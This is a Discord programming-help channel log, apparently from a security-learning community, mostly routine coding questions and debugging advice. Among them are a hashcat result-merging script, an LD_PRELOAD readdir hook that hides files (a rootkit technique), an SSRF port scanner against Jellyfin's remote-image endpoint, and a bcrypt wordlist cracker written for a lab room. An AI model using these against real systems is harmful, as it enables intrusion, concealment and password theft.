#programming

why is the output always 0

Nah sorry my bad

the condition should be !=. not ==

yup pretty much

you just set wtf to 0 otherwise

New c++ paradigm is to not use raw pointers, and encapsulate with an appropriate pointer object. Other than that, I second everything hydra recommended. String literals are always c constant strings that are immutable as well

auto_ptr, now, no?

or did I get lost in 2015

auto can be a pointer - specifically the <memory> header. https://en.cppreference.com/w/cpp/memory

auto_ptr was removed in C++17, for this use case, I'd suggest using a shared_ptr if passed in, or keeping the unique_ptr scope to the function itself.

Also, consider refactoring to separate stdin input from being read in the class functions, and passing inputs instead. Keeping business logic code separated from interface code has always made debugging much simpler in my experiences

Ah right that was it

(You can, btw. As a bonus, you can technically override == and forget to also override != )

That sounds like great fun waiting to happen

At least as much fun of Rule of 7 being partially implemented

which one's that?

My bad, it's rule of 5

I mis-remembered

https://en.cppreference.com/w/cpp/language/rule_of_three

I found the output of hashcat confusing since it was just hash:password with no usernames so I made a thing to reconstruct an /etc/passwd with the found passwords (don't tell me it already exists now). If there's any way of doing it better that would be nice to know ( converts $6$ hash to found passwords in any order in a list)

#cracked = [input("Enter path of hashcat output (format: $6$hash:password): ")]

file = ['~/test/unshadowed']
cracked = ['~/test/cracked']
count = 0
result = []
print("")
with open(file[0]) as x:
    lines = x.readlines()
    for line in lines:
        line = line.strip()
        splitline = line.split(':')
        if len(splitline[1]) <= 6:
            result += [':'.join(splitline),"\n"]
        else:
            with open(cracked[0]) as y:
                lines2 = y.readlines()
                for line2 in lines2:
                    line2 = line2.strip()
                    splitline2 = line2.split(':')
                    if splitline2[0] in splitline[1]:
                        count += 1
                        result += [':'.join(sub.replace(splitline[1], splitline2[1]) for sub in splitline),"\n"]
output = (''.join(result)).rstrip()
print(output + "\n")
print(count,"items replaced.",end='')

save = input(" Save passwordshadow.txt in this directory? (y/N): ")
if save == 'y':
    try:
        with open("passwordshadow.txt", "x") as f:
            f.write(output)
    except FileExistsError:
        save = input("File already exists, overwrite? (y/N): ")
        if save == 'y':
            with open("passwordshadow.txt", "w") as f:
                f.write(output)
else:
    pass```

(don't tell me it already exists now).

So for hashcat, you can use --usernames to say the input file is username:hash format

Then with --show --username on the file it'll print it out nicely

I can't remember if it's username or usernames

well i got the fun of coding some python anyway 😄 thanks @onyx merlin

Gave +1 Rep to @onyx merlin

Reccomendations for a HTML/css library for styling a multi page site I'm building?
Looking for ease of use and consistency basically.
My eye is on BootStrap5 presently.

tailwindcss

@restive fossilQuestion: Why?

project

thought it was cool

i know it sounds sus

its just a project

It definitely does sound sus 😆

Please don't ask here

yeah i know

oh so its not allowed?

ok

There's no way to know if you're using it illegally

ill delete

So, yeah -- under rule 9

ok, i understand😅

muir is there a place i can ask or is it completely forbidden?

Reach 0xD, get OSCP/eCPPT, or complete Throwback then there's a channel for it

theres a channel that concerns malware?

You will get access to exploit-and-mal-studies

oh thats sick

So keep learning.

the only one that seems achievable right now is 0xD so imma get to doing rooms

https://support.discord.com/hc/en-us/articles/1500012250861-Bots-Buttons

hey guys a little help with date formats

I have this date generated in my db 2021-05-29 20:47:41.966541

and this one received in my graphql 1622339261966

I cant decipher the second one

solved it was a milisecond time stamp

It's a std Unix timestamp

beat me to it

https://tenor.com/view/hikigaya-hachiman-oregairu-anime-seriously-huh-gif-19862795

hahahaha

whole 2 hours on this issue

😢

wish I was joking

At least it was something this simple and not something that requires a lot of work to fix

yea

still dont understand why graphql changes it

graphql is likely not changing it

its iso on the db

2021-05-29 20:47:41.966541

the underlying structure is ms since jan 1 1970; your datetime obj is likely converting it to be human readable after the datetime is stored

hmmm

welp its solved

that's a pretty common thing, in a lot of languages.

Folks want to argue with me about it, but from a machine perspective, what's more efficient to generate and store. wall time from the hardware in a raw byte format, or a complicated string with weird formatting

yea I see why the unix on is better

just a plain string of numbers

what's the underlying db? postgres?

yep

doing a fullstack project

are you using a timestamptz datatype for the column?

I think so

Im using typeorm

using the createdatecolumn function

yeah, underlying data structure is microseconds

you prob know more than me on this one

Hey yo, i am doing a source code (PHP) review and some stuff is not making sense so i wanted to ask about what does do for example :

preg_replace('/...(.)/', '$1', $$somevar)

what is the ...(.) thingy replacing

it looks like a regular expression, I'm not familiar with PHP (regex implementations can have some idiosyncrasies..) but usually

• the dot . means one (any) character
• parentheses denote a group you're interested in particular, to refer to later with the $1 you see as the second parameter

so it looks like it's particularly interested in the 4th character

the docs for preg_replace should help from there

and I hope I'm not leading you astray with this, someone who actually knows PHP please correct me if I'm wrong

Thanks a lot @lilac holly i was trying to use regexeditor and stuff and i think it was leading to the same thing you were saying , so it does seems like its intrested in that 4 character

Gave +1 Rep to @chrome crow

sure thing! regexr.com is really good for this too

Thanks i will check that website ut

Hey i need some help with encryptions in cpp, i wanna use windows builtin but cant seem to find anything for cpp specifically, most of them are c# code so do i nees to learn c# or is there a way to do it with cpp

There should be a way to call a c# module from cpp code, but I don't remember it offhand, I haven't had to interop between those two languages in a long time.

Im looking into it

Your best bet to find CPP code to do cryptography stuff on windows is to look in the CLR libraries - visual c++ used to be supported, but I don't know if that is still true. MS may have dumped CLR support for VC++ in favor of the regular .NET family of languages.

Hmm i've looked there but nothing yet tho

So they might have dumped it

The other alternatives for C++ seem to be crypto++ or openssl. If you aren't very familiar with using 3rd party libraries, you are going to have a struggle getting them to work.

Yeah im gonna have so much pain with this

Guys

I need help

In a loop

I constantly have numbers that need to be added to a variable

That's fine, I did that

But

Once a certain command is detected

For example

"Adopt"

My code needs to break out and print text + variable after that

So my question is

The input will constantly be reading integers

But it must be able to read the command when inserted

How does that happen?

if block?, like test if its an integer or no, if its not just print out what you want

It's easier to provide source code and explain what you expect from it

Start writing unit tests

If a functionis longer than ~30 lines, break it into smaller smaller functions. This will help you compartmentalize your code so you aren't solving the entire problem all at once.

I had tasks

To do

But I did them, thanks anyways

They had certain requirements

It's just hard to explain without giving the official paper with the task, but well... Anyways

Thank you, wonderful people!

It was a written task in my language

i have done 65 % of course on solo learn for python should i do some leetcode problems or should i complete the course

you can start with it if you're confident enough , upto you

Guys I'm new to programming.. I'm confused with python, java and JavaScript what should I learn first

I'm interested in contributing to open source too

Python is much easier in my opinion, but it depends on what you want to contribute to.

I'd suggest that you learn programming principles and the basics of the language you want.

If you are not sure what you want, I would also suggest that you google what the best programming language is for the area you want to contribute to most.

Java as a language is more accessible, but there is also a higher learning curve to understand the environment to write hello world

Ohh okk

Really, it depends on what your goal is

The basic programming logic will be the same regardless of language

I'm just focused towards Google summer of code rn.. any help with that?

There are a lot of projects you can contribute to, in a variety of languages. Are you interested in how performant code is written, OS stuff, cloud application endpoints, and a lot of others. Pick a project that appeals to you, you'll get more out of it than just me giving you my opinion

Oh ok.. thanks 😊

Gave +1 Rep to @magic falcon

hey guys i want to learn php , im done with basics but now i have no idea how to go from there . any advice ?

Any beginner/Intermediate programmer of any language who wants to play https://www.codingame.com/ with us for learning and fun

guys i have a cpp code and there is an error saying " [Error] cannot convert 'std::string {aka std::basic_string<char>}' to 'const char*' for argument '1' to 'size_t strlen(const char*)' "... anyone can help...sry new to discord idk how to i send my cpp code

You should be using string functions/methods instead of ones intended for c style strings.

Ok?

ok im strugling to work with cpp third party libraries, specifically openssl, you see i need nmake but that is not on my box, google and found out that i need windows sdk, downloaded that with vs but still nmake is not on the box, i really really need some help

also i tried conan, vcpkg but none of them ended up working properly

all gave the same error saying that it cant find an instance of visual studio

I am losing my mind so please help

Does anyone know how to remove whitespaces when I try to include a php file. It's creating unnecessary whitespaces on webpage

Are you doing this with CLI commands? or using an IDE?

IDE

Sort of

Im using vim

And compiling with g++

just finished this tool lol https://github.com/CaraTortu/OnionService

!crack c6920359ca4a08e3de98f3a3c0284e42e4a56dd0e474d949b44c78b6dc558eaafb1d2bb88f78d26d774b6e3ffc70be65

broke

atm

will fix later

sorry

ahh sorry

also if i used this during a ctf is that cheating

Also preferably #bot-commands

It's pretty clear you don't know the flags for whatever build system you are using. Please read the docs for g++ on including 3rd party libs, and the docs for all your dependencies. You may have better luck attempting your project in a more beginner friendly language, or simplifying your project's starting point

Unless the CTF specifically states otherwise, no.

Ok im gonna try that then thanks for the help

Gave +1 Rep to @magic falcon

hi, if anyone knows html, js etc, i need some help pls , so i have this code here, that creates a timer in js for an html website and its like a target practice website, so you need to click a taget that jumps to a random spot on the screen everytime you click it, so i crerated a function for that and used it with onclick="myfunction()", but im trying to check if the timer is at 0 seconds so i can disable the button but for some reason it never works, heres my code: ```function startTimer(duration, display) {
var timer = duration, minutes, seconds;
setInterval(function () {
minutes = parseInt(timer / 60, 10)
seconds = parseInt(timer % 60, 10);

    minutes = minutes < 10 ? "0" + minutes : minutes;
    seconds = seconds < 10 ? "0" + seconds : seconds;

    display.textContent = minutes + ":" + seconds;
    if (--timer < 0) {
        timer = 0;
    }
}, 1000);

}
var btn_test = document.getElementById('btn_test');

window.onload = function () {
var time = 2
display = document.querySelector('#TimerDisplay');
startTimer(time, display);
};

function Buttonrand(elem){
elem.style.position ='absolute';
elem.style.top = Math.floor(Math.random()*90+5)+'%';
elem.style.left = Math.floor(Math.random()*90+5)+'%';
}

btn_test.addEventListener('click', function(e)
{

Buttonrand(e.target);

});

var count = 0;
function myFunction() {
document.getElementById("text_forscore").innerHTML = "Score: " + count++;
}
/*
Here the time is supposed to be checked

if (time <= 0){
btn_test.disable =true;
}
*/```

pls help

i aleady tried to doif(time.value <= 0){btn_test.disable =true;} and any variation with "<", "==", etc. i cant figure it out

Have you tried checking what the value is? For example, by generous placement of console.log in your code, or checking them out in log after debugger; keyword?

what ive been trying is to check it 'timer' or 'seconds' are 0 because i realized that time actually never gets modified it only gets given to startTimer()

it works now, thx 🙂

Gave +1 Rep to @solar hull

Wonderful 🙂 And you found out the reason by yourself.

heyy

struct dirent * dir = old_readdir(dirp);
if(dir && cwd != NULL) {
        if(strcmp(cwd, dirname(strdup(LD_PRELOAD))) + strcmp(dir->d_name,basename(LD_PRELOAD)) == 0){
          dir = old_readdir(dirp);
        }
        else if(strcmp(cwd, dirname(strdup(HIDDDEN_DIRECTORY))) + strcmp(dir->d_name,basename(HIDDDEN_DIRECTORY)) == 0){
          dir = old_readdir(dirp);
        }
}
return dir;

how could i simplify this so i dont repeat dir = old_readdir(dirp);in the if statements

if( (condition1) || (condition2) ){ doStuff(); }

ikk but the conditions are wayyy too big

it would look like trash

then do something like:
bool cond1 = your long expression here
bool cond2 = your long expression here
and then do what I said above, using cond1 and cond2

but name your variables something meaningful, that was just a shorthand.

you can also break the || on two lines

compiler doesn't care about whitespace

@undone kettle Hey, I know it's a bit late but you could also use a macro definition which in this case would be better than a variable since it doesn't take up any unwanted memory. For example :

#include <stdio.h>
#define TEST printf("Hello World\n");

int main()
{
    TEST
}

Will output :

Hello World

So you could assign your conditions to a macro statement and simplify the code to something like

#define CONDITION1 strcmp(cwd, dirname(strdup(LD_PRELOAD))) + strcmp(dir->d_name,basename(LD_PRELOAD)) == 0
#define CONDITION2 strcmp(cwd, dirname(strdup(HIDDDEN_DIRECTORY))) + strcmp(dir->d_name,basename(HIDDDEN_DIRECTORY)) == 0
#define STATEMENT dir = old_readdir(dirp);

struct dirent * dir = old_readdir(dirp);
if(dir && cwd != NULL) {
        if(CONDITION1){
          STATEMENT
        }
        else if(CONDITION2){
          STATMENT
        }
}
return dir;

Obviously for CONDITION2 you should try and keep the code snippet on the same line as the "initialisation" of the macro definition. Another thing to know about macro definitions is that you should always try and name them in uppercase letters. (see https://www.programiz.com/c-programming/c-preprocessor-macros).

One last thing (just a tip for programming in c and many other languages), instead of having == 0 at the end of your condition you could also wrap the statement in brackets and prepend an ! to the start of it... like so : ```c
!(strcmp(cwd, dirname(strdup(LD_PRELOAD))) + strcmp(dir->d_name,basename(LD_PRELOAD)))

when using an exclamation mark and brackets with a boolean value it reverses the value, so for example
`!(1)` (and anything more than 0) is the equivalent to `0` and `!(0)` is the equivalent to `1`.

IMHO macros tend to make the code cluttered.

just a suggestion

Yeah I'm gonna be honest I prefer this for readability over macros

¯_(ツ)_/¯

what can I say? I guess I just don't like taking up unnecessary memory

but whatever floats your boat

Ah yes, sacrifice like 2 bools of memory and gain great readability especially in larger codebase

You get the memory back at the end of the function so eh.

yeah but if it's the main function...

but I guess it doesn't matter too much, sacrificing 4 bytes of memory for readability is something that I can see happening

We should forget about small efficiencies, say about 97% of the time: premature optimization is the root of all evil. Yet we should not pass up our opportunities in that critical 3%

:)

https://tenor.com/view/perfectly-balanced-thanos-infinity-war-gif-13078930

Does anybody know the SQL here.??

I need help because I have to submit my assignment tomorrow 😩😫

I know enough to get by.

@lilac holly does he can help

which IDE do you guys use for coding python?

editors/for dec

dev

pycharm is nice

ye currently using that only

pycharm / vs code

Hi, a question in python i have timestamps like this : 23:22:00.123829 and 22:21:00.156789 how do i subtract them to get the duration

You can take ticks of these values and substract them. After that you can convert substracted value to time.

https://stackoverflow.com/questions/31929538/how-to-subtract-datetimes-timestamps-in-python ? 👀

Thanks noct

Gave +1 Rep to @hidden prawn

Thanks for this aswell

i willt ry both

Hey, another question how do i delete like items from a list and then store it to the same list in python

id_of_email = np.delete(id_of_email, ids)
status_of_email = np.delete(status_of_email, ids)
time_of_email = np.delete(time_of_email, ids)

this something i was trying

but doesnt seem to work

What you are asking doesn't makes sense when compared to your code sample. Can you clarify what the list is and what the list consists of?

list consists of email_id lets say i am looping over these ids and grouping all the ones that are same doing an operation on those and then i want to delete all of those ids (ids is the index of those items i want to delete in the list) and then i wanna store them in the same list as its a for loop doing an operation on them

Can you rewrite that as not a wall of text?

the explanation?

Yeah.

There is a list of ids of emails i am looping over to find the indexes of the items that have the same id

and then using those index i wanna remove them from the list

and want to store them to the same list

Break it down more. You aren't articulating well what you are still trying to find. Is the list only email IDs, or ist here other content and metadata in the list items as well?

So you have a list of ids and you want to find which emails have the same* id and store them in a separate list?

not store them but delete them from the list

and store it in the same list

So you want to remove items from the list while you are iterating over that list?

temp = []
for id in list:
  if id in temp:
    id.pop()
  else:
    temp.append(id)

Like that?

It shouldn't work but it's a general idea

There are some other problems I'm getting at, Jabba 🙂

i will write some pseudo code

list = ["a","b","c","d","e"]
ids = [1,4]

# I wanna now remove these certain indexes [1,4] from the list

So again, are you trying to iterate over list and remove items from list at the same time?

Oh, I see

i iterated over a list got the ids i needed , and then before going to another iteration of the loop i wanna remove the ids and elements i already worked on

in that iteration i am doing an operation on those certain elements

Ok. So that's good; removing items from a list while you are iterating is bad. Don't do it.

Like that?

My next question: Is there a standard list function as part of python that allows you to remove elements?

.pop yes

yess the issue here becomes that the ids dont corelate then

Right. So why are you using delete()?

thats using numpy

What do you mean by correlate? The IDs remove the wrong value?

which is another libraru

yess

So you aren't dealing with lists, you are dealing with numpy dataframes

That's a problem with your other script then, it must be returning the wrong value

That makes everything you described very different

lists and numpy.df objects are very, very different.

here as well it removes the 1 element but doesnt remove the 3 element d

soo it is a list but i saw solution which told turn them to numpy to make it easier

Is it because lists start from 0 and you're starting from 1?

soo i turned my list to numpy

it starts from zero sooo 1 would be b and 3 would be d

and in the final list it didnt pop out "d"

It's pretty clear you have a vague idea of what you are trying to do. Don't just blindly follow someone elses code, break down what you want to do before you start pounding away at the keyboard.

It's straight forward

Simply

When you pop one vlaue out the list

the list becomes smaller

yeaah was trying on debugging that but will get on that

Read the docs for numpy on dataframes and what delete() actually does.

You have a misunderstanding in your usage that you need to correct if you are going to use it.

list = ['a', 'b', 'c']

# a = 0
# b = 1
# c = 2

One the first iteration, you would remove 'a'

list.pop(0)

Now the list is ['b', 'c']

b is now 0, and c is now 1.

Then when you're looping again, it's using the smaller list.

If that makes sense

yess it does, i do understand thats how it works its just when for looping over the ids and deleting them we would have to decrease the ids everytime then

Jabba, you are making this too easy for Nick! Suffering is the root of acquiring knowledge

Thanks guys i think its finee

i will figure it out , Thanks for your time and help

+rep @true pumice

Gave +1 Rep to @true pumice

You're a mentor, telling people to go research is the complete opposite of why we're here

I disagree with that sentiment

I disagree. Mentorship is pointing people in the correct direction

Otherwise you are doing the work for them, which doesn't help them grow

People have a responsibility to do their own research before asking.

i mean not to be rude or dis regard your arguement a lot of people ask after getting stuck for a while

Handing people answers to really basic things instead of forcing them to work through the problem doesn't develop their problem solving skills at all

i dont plop a question for every thing i see

but when it doesnt make sense

and solutions on the internet dont make sense

Yeah, I get you. Which is why I was asking questions to identify where your misunderstanding is

Then I can point you in the direction you need to go

The hardest part of learning and growing is knowing which direction to go in. There is a lot of bad info out there, and google doesn't always give useful results if the search term isn't exactly what you need

i dont really think what jabba said was the answer though he was telling the basic ideas about lists

would agree on that

He handed you the answer I was getting at - you were modifying the list and expecting the indices to be the same after removing an item.

My next set of questions would have revolved around step through debugging in your IDE or using pdb

i ddi know that the issue was the indexes and i was wondering on how to approach it (as i know everytime i decreased a index the list becomes smaller and the indexes changes)

You really need to be better at articulating what the problem is, then. Because what I got from your initial ask was 'why isn't this working' not 'what's a useful approach to modify a list as i go over it'

i was not asking for an answer more for how to approach the problem

i guess its my fault on how i formualted the question then so my bad

I don't think there's a problem with "why isn't this working"

-mute @severe shore 5m Don't be rude.

🔇 Muted T4TCH3R#6282 for 5 minutes

Sorry, I was about to follow up my point

Agreed. But it's an entirely different question, and my approach would have been very different.

as long as you can justify the approach you're taking

yeaah i was trying to explain how and why i used numpy there

as i tried a few other ways and they didnt tend to wokr

Oh, I get why you used numpy. One thing you need to remember when doing data analysis is that modifying the original isn't usually a good idea. Making copies of lists is really easy and fairly cheap to do - this solves the problem of modifying the list as you go

Unless your list is ridiculously huge, processing it using copies is usually a better route than trying to add or remove while you iterate over it

yeah that was another approach i tried but it didnt work tried to store numpy into a new list and copy that new list to the old list

Additionally, if you already know what the value is you need to filter on, there isn't a need to make a second list of indices.

Why would you copy the new list to the old list?

The new list is just a subset of the old list

also just to counter (Not devaluing your help i appreciate the help) but this feels like the mentalitiy that you gotta suffer to learn

i am not sure if thats goood

cause i was doing operation on the old list

Lessons hardest learned are best remembered.

doesnt mean that everyone has to go through the same suffering the first guy who learned python did

again i dont want to be disrespectful as i appreciate your help

but it sounds like if i suffered in learning this i feel others should too

A large part of working in IT is developing problem solving ability. Creativity and flexibility are essential to that process; struggling with the problem seems to rewire the brain more effectively than just being told a solution.

but again why do you think people ask in the chat its usually when they have tried a few things and troubleshooted a lot , again i was trying to ask for a approach

why do you think people ask in the chat its usually when they have tried a few things and troubleshooted a lot I wish that was the case lol

tbh many don't

damn

i mean i tried a fair few solutions to solve mine and then when none worked i asked

We wouldnt see you chatting so often lmaooo

So I'll add this, then I need to get back to work: Being able to articulate and document a problem is at least as important as solving the problem is.

@lilac holly

hi @lilac holly

hey y'all looking for advice on optimizing some code, this routine is the main algorithm for a program

my program reads a file byte-by-byte, if the int value of the current byte is not 0-2 then this algorithm get executed and returns a tuple which sums the int value of the supplied byte

this returned tuple is then split in two elsewhere in the program, each half written to a different file to be re-assembled at the user's leisure

problem is this program takes about 8 minutes to run on a 70KB file 😭

def theTupler(mainByte):
    factors = []
    goodPairs = [] 
    byteMe = mainByte[0]
    
    while byteMe != 0:
        byteMe -= 1
        factors.append(byteMe)

    raw_pairs = itertools.permutations(factors, 2)
 
    for tuple in raw_pairs:
        if (tuple[0] + tuple[1]) == (factors[0]+1):
            goodPairs.append(tuple)
    
    final = random.choice(goodPairs)
    return final

Have you run the profiler on your code?

The profiler will tell you exactly where the time is being spent; I have a suspicion on where it is, you'll kick yourself when you see it.

no I have not, that was actually going to be my next question, as my way of testing code is pretty primitive - like putting print statements before/after code-blocks primitive, this should help though, thanks!

Gave +1 Rep to @magic falcon

Are you free? This is an area i'm pretty well versed in, I've got about 30 min before my next meeting if you want to have a quick chat about testing practices and methodology.

sure that sounds great!

Don't think its a programming question, but anyways..

Why was stack chosen for growing downwards(downhill) and heap(uphill)?

is it just because to simplify indexing into the stack from a user program?

p.s. I am aware that stack going downhill is not a general thing, different processors have different ways.

There isn't really an up or down in computers/circuits, that's just the way we look at/interpret it, because it makes it easier to think about it or visualize it

really because i read somewhere that it soley depends on the processor..?

Different processors do behave different ways, yes

IIRC it had to do with data allocation efficiency in single-CPU systems way back when. Are you studying or familiar with the concept of 'higher half kernel'?

Stack direction could also change given a combination of compiler and architecture as well - a compiled program may grow stack up on with compiler A and architecture X, but compiling with compiler B on architecture X may allocate differently and grow stack down.

Actually its a funny story, i was reading about BOFs, in that the subtopic was how memory works, and i've studied about Computer Arch a while ago, so i was curious why Stacks direction goes the way we're told it goes.
I didnt had this question when my profs were teaching it and while i read the book on it.
I researched a bit on it but didnt really got a good explanation.

I'm not fully confident in my answer - take it with a grain of salt. My personal opinion is that it made stack and freestore easier to predict what we consider today consider low-memory systems. In all practical aspects, stack direction doesn't matter at all due to the random chunks that should be allocated at runtime for individual application usage

counting down is somewhat more efficient, especially for checking if any space is left. As a test is always against zero, counting up would require a subtraction before the test

the difference is marginal these days

though on smaller systems/µCs it might be relevent

@everyone
Hey guys is it possible to use tensor cores on nvidia gpu to crack password fast with cuda cores and tensor cores working to gather with help of AI algorithm run by tensor cores which will calculate hash of every next encrypted with specified hashing algorithm with some changes in tools like hash cat and john (because in gaming tensor cores are used to handel npcs and up scale the frame running on low resolution)and i think this is only possible on nvidia gpu because they have tensor in their gpu and programe called dlss and AMD GPU provied same but only on software side and their gpus don't have dedicated hardware in their for it

For example consider hashing algorithm in which encrypted version of abc something like this 2rd57hhs if the password is abc then tensor will find hash for a and then b and then c and send it to cuda for further processing

dont use [everyone] please

Ok

I am by no means an expert in cryptography , but the hash for abc is different than hash a + hash b + hash c for most hashing functions, also what would the AI do exactly ? I dont get it

Ok so consider a imaginary algorithm in which hash for abc is 2rd57hhs so ai will go to every known hashing and try to find with part of whole hash will try to match hash for a then and so on without any wordlist or dictionary while cdua in gpu will run normal CRACKING

Answered elsewhere.
short answer: What?

What

"Every known hash" That's an insane amount of data, and you're describing a rainbow table.

he is describing starbucks menu basically

What you want to do isn't feasible. hash(A) + hash(B) != hash(A+B)

hash a = 20 charecters
hash 20 charecters = 20 chars
hash 770 chars = 20 chars (not sure here)

Yes but on tensor core will spped up the process with help AI program for tensor cores corrently i m not able to explain but try to understand if you have graphics card like rtx 2060 having dedicated tensor cores for AI sittind idel when you are CRACKING on gpu the program will utilize them to crack hash faster

And i am not also crpto exprt i m just share thought of my mind

There is no use for the AI

What kind of AI algorithm? ML isn't going to work at all.

don't think it's that feasible, besides, hashcat already abuses the GPU

@lilac holly Unless you can describe why the tensor cores would be applicable, I don't think you're going to convince anyone that they're useful here.
You cannot just throw AI/ML at a problem and assume it will help.

by definition a hash yields unpredictable results

a small change in input yields a big change in output

don't think ML'll be useful here beyond storing known plaintext:hash combinations...

Why is ML applicable there? Searching sorted maps is fast

might be able to speed up rainbow tables

I'm basically saying it's not useful in any case

but ML is the buzzword these days, gotta throw everything at it.

problem is that ML is good at finding trends/connections, but hashing by definition has no trends (or shouldn't in any case)

the point is that you can't tell what the input is for a given output

Well, not without calculating it

even then

Expensive, time/computat ion wise

given a hash, you can't find the plaintext without bruteforce

Sorry, yes, misread that

unless your algorithm is broken

but hey if someone can figure it out then go for it

if somone could mathmatically break a modern hashing algorithm, to the point of instant reversablity

what are the wildest implications ?

You'd be able to reverse the hash. Making it not a hash, it would be an ecryption or encoding.

I heared it is much more wild than that

You heard wrong.

Please provide sources, that contradicts everything I know about hashing.

yes

ok so I checked , you are right, but I got confused between hashing and an article I read about what would happen if we found an instant way to solve sudoko

Domain-constraint solving is very very different than hashing.

You should see what happens if we find an efficient way to break a number into it's prome factors 😉

yes I get it now

aight

Lol. What are you going to suggest next, solving traveling salesman in polynomial time?

if you can do it for any input, you have a very very good compression algo

Have you tried applying bogosort?

black hole compression

please link me an article or a cideo on the thing

I would but not at my PC

Anything I link would probably be academia so sometimes paywalled

Ok forget what i said before now question is can program like hash can utilize tensor cores on gpu to speed up the speed of CRACKING

Hashcat i mean

would it like break physics or something, how wild it is ?

And we've said no

It'd break public key cryptography, if it's efficient enough.

@onyx merlin found the link to the video that talks about sudoko, , https://youtu.be/YX40hbAHx3s

I hate to whip out wikipedia, but this is why people are scared of quantum computers

https://en.wikipedia.org/wiki/Shor's_algorithm

woah

I read the first line

it would break auth

but also solve dna folding and path finding in the process,right ? (probably worng )

Sure you can. That's the hot new buzzword, businesses everywhere are doing it!

One of my lecturers did it, with my final year project idea.
He didn't reply to my email asking how it could fit in to the project...

tensor cores no, but gpu in general, yes. Programs already do that.

What, he just said "Add AI/ML" ?

🙄 🤣

And I'd be willing to bet that half of that is so that he can "advise" you on writing a paper to publish, for one more bullet point on his cv

FYP like a dissertation, needs a supervisor

And yeah, I didn't get a reply

Redacted something that might identify the guy

yeah, academia is a fairly broken system. At least in the US. I hear you folks have it a little better

from what I understood about quantum computing is let's figure out a way to get a superposition of all possible results and collapse it onto the correct one

the rest is mostly magic

They have a lot of research projects, but yeah I assume it'd be so it could be submitted to IEEE or something

Ever seen the movie "Sneakers" ? If half of what people say about quantum computing is true, it would break everything, and change all the rules

it'll break RSA and DHE

That's on my list.
I had to do a research project about quantum-safe crypto and the crypto break so I'd like to think I'm reasonably educated on it

since those are based on prime factors

It also breaks ECC

The discrete logarithm problem is also affected by Shor's

so most public key crypto then

Grover's algorithm provides general speedups for hashing and sym crypto, but doesn't break break them

symmetric crypto is a different beast

Have you heard the recent story about the "unhackable CPU" ?

NSA's advice RE Sym crypto is just to go to AES-256 from 128

The two scary algos are shor's and grover's

should be using AES-256 anyways

with a modern mode

Currently, limited by the qbit count. There's a couple classes of quantum computers and we don't have anywhere near enough stable qubits in the right type.

ie if I see you using AES in ECB mode you're getting your arse kicked from here to...somewhere far away

Ok but it's neat!

most quantum computing algos amount to fancy bruteforcing

Grover's is the algo related to searches etc that weakens hashing and sym crypto

I'll have to take your word for that, I don't know quantum hardly at all

I have a bunch of academic papers on it, but we all know how accessible they will be to most people here...

try all the possibilities and measure the one that fits

but even if it's brute forcing, if it can do it at many orders of magnitudes faster than current, it suddenly makes impossible things feasible

in very vulgarized terms

it bruteforces in O(1) time basically

If I understood correctly

so yeah.... that's a big deal

that changes everything

it does

which is why you have to rethink encryption

I recommend leaving the rethinking of encryption to the crypto people

yes

still O(n) space though, probably

We have the standards really, I think we're in the final rounds of some of the competitions

the "royal you"

that said, for now, use proper Key-derivation functions, and AES-256 in a sane mode.

and DHE or some other public key crypto to share the key

That reminds me, I want to write a challenge response protocol

Another thing for my list then

most of them use RSA or the like

encrypt a nonce, send it as the challenge, response should be the same nonce encrypted using the challenger's public key

for example

(this would probably be a bad method tbf)

look up Webauthn though, it's pretty neat

Whomever coined the word "nonce" in cryptography was certainly not british.

Oh, you think I want to do it securely?

look up Kerberos then

@magic falcon hey FWIW I managed to trim down that function I was working on the other day down to a quarter of the size and thanks to pytest actually had improvement I could measure - still slow as hell but does exactly what I want

Gave +1 Rep to @magic falcon

now to tackle multi-threading program design next

That's a big improvement! Did you run the profiler?
Threading is a real big issue in python. If you feel lost after looking at both async and multiprocessing, let me know

look up concurrent.futures

yep the profiler helped a bunch actually but the problem is mainly with the program design, not a quick fix Im seeing without tearing everything up

will do, I took a crack at using 2 threads very late last night and did not have a good time - might possibly just write this in Go tbh

Good recommendation. Most of the time, I'm dealing with race conditions and producer-consumer relationships - futures didn't even occur to me

It seemed to be the easiest threading bit to me in python3

It combines well with tqdm if you need progress bars

I thought async was the easiest, but it doesn't get around the GIL. multiprocessing does, and it looks like concurrent.futures is tightly coupled to multiprocessing

Or is it tdqm

Concurrent.futures simplifies the syntax at the very least

I can grab some examples in a bit if needs be

if have you have em please do, ill throw them in my notes - either way I know where to look now 🙂

class PortScanner:
    def scan_port(self, server_url, ip, port):
        try:
            r = requests.get(url=f"{server_url}Images/Remote?imageUrl=http://{ip}:{port}", timeout=1)
        except requests.exceptions.Timeout as e:
            return;

        if r.status_code < 400:
            print(f"{ip} : {port} {colours.green}OPEN{colours.end}")

    def scan(self, server_url, ip, ports):
        ip_port_tuples = ((server_url, ip, port) for port in ports)
        with concurrent.futures.ThreadPoolExecutor(max_workers=32) as executor:
            executor.map(lambda p: self.scan_port(*p), ip_port_tuples)

Here's a basic port scanner

that I used for my jellyfin attack

oh wow thats a lot more readable than what I was looking at lol

max_workers is the number of threads, basically

executor.map takes in a function

I use a lambda here because my function has multiple params

but if I had no params, then I can just use the function reference

recommend looking at the documentation though

import base64
import bcrypt
import sys
import concurrent.futures
from tqdm import tqdm

salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'

def testPasswd(password):
    bpass = password.encode('ascii')
    passed= str(base64.b64encode(bpass))
    return bcrypt.checkpw(passed.encode(), salt)

def genPasswd(password):
    saltySalt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UO'
    bpass = password.encode('ascii')
    passed = str(base64.b64encode(bpass))
    crypted = bcrypt.hashpw(passed.encode(), saltySalt)
    return crypted == salt

with open(sys.argv[1]) as f:
    passwords = f.readlines()
    maxLines = len(passwords)
    print(f'{maxLines} passwords to test')
    with concurrent.futures.ThreadPoolExecutor(max_workers=16) as executor:
        for pwd, res in tqdm(zip(passwords, executor.map(genPasswd, passwords, chunksize=10000)), total=maxLines):
            if res:
                print(f'Found match: {pwd}')

here's a bit that was trying to crack a bcrypt password for a room

sorry about the bad code

oh you haven't taken a look at github then don't worry about bad code lmao

this is super helpful though, i guess my biggest hurdle is just kinda wrapping my head around designing functions that work with multiple threads, I just have to make sure things are put in order in my case

I don't remember all the details offhand, but multiprocessing should be better for data in memory, and async should be better for I/O bound tasks. @brazen eagle probably has better insight here than I do

I don't know python THAT well

I just use whatever's easier to code 😄

but I'd probably generate benchmarks if I really wanted to try optimizing

for multithreaded functions, you want to remain as stateless as possible.. good advice for any function, really

avoid side effects and everything should be fine

